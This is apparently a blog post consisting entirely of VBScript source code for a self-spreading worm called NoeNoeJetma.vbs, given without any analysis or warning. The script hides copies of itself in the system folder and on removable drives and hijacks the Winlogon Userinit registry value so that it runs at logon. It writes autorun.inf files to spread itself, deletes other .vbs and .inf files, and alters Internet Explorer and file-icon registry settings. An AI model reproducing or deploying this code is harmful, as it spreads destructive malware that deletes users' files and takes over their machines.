On Error Resume Next Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg Set Fso = CreateObject("Scripting.FileSystemObject") Set Shells = CreateObject("Wscript.Shell") Set WinDir = Fso.GetSpecialFolder(0) Set SystemDir = Fso.GetSpecialFolder(1) Set File = Fso.GetFile(Wscript.ScriptFullName) Set Drv = File.Drive Set InDrive = Fso.Drives Set ReadAll = File.OpenAsTextStream(1, -2)
Do While Not ReadAll.atendofstream AllFile = AllFile & ReadAll.readline AllFile = AllFile & vbCrLf Loop Count = Drv.DriveType Do If Not Fso.FileExists(SystemDir & "\NoeNoeJetma.vbs") Then Set WriteAll = Fso.CreateTextFile(SystemDir & "\NoeNoeJetma.vbs", 2, True) WriteAll.Write AllFile WriteAll.Close Set WriteAll = Fso.GetFile(SystemDir & "\NoeNoeJetma.vbs") WriteAll.Attributes = -1 End If Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\NoeNoeJetma.vbs" For Each Drives In InDrive
If Drives.DriveType = 2 Then LookVBS "inf", Drives.Path & "\" LookVBS "INF", Drives.Path & "\" End If
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then If Drives.Path <> "A:" Then Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", "" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "" Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe,2" LookVBS "vbs", WinDir & "\" LookVBS "vbs", Drives.Path & "\" If Drives.DriveType = 1 Then If Drives.Path <> "A:" Then If Not Fso.FileExists(Drives.Path & "\NoeNoeJetma.vbs") Then Set WriteAll = Fso.CreateTextFile(Drives.Path & "\NoeNoeJetma.vbs", 2, True) WriteAll.Write AllFile WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\NoeNoeJetma.vbs") WriteAll.Attributes = -1 End If If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf") Chg.Attributes = -8 Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True) WriteAll.WriteLine "[autorun]" WriteAll.WriteLine "shellexecute=wscript.exe NoeNoeJetma.vbs" WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 Else Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True) WriteAll.WriteLine "[autorun]" WriteAll.WriteLine "shellexecute=wscript.exe NoeNoeJetma.vbs" WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 End If End If End If End If End If Next If Count <> 1 Then Wscript.sleep 10000 End If Loop While Count <> 1 Sub LookVBS(File2Find, SrchPath) Dim oFileSys, oFolder, oFile, Cut, Delete Set oFileSys = CreateObject("Scripting.FileSystemObject") Set oFolder = oFileSys.GetFolder(SrchPath) For Each oFile In oFolder.Files Cut = Right(oFile.Name, 3) If UCase(Cut) = UCase(File2Find) Then If oFile.Name <> "NoeNoeJetma.vbs" Then Set Delete = oFileSys.DeleteFile(SrchPath & oFile.Name, True) End If Next End Sub Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\NoeNoeJetma.vbs" Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", "" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "" Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe,2"
No comments:
Post a Comment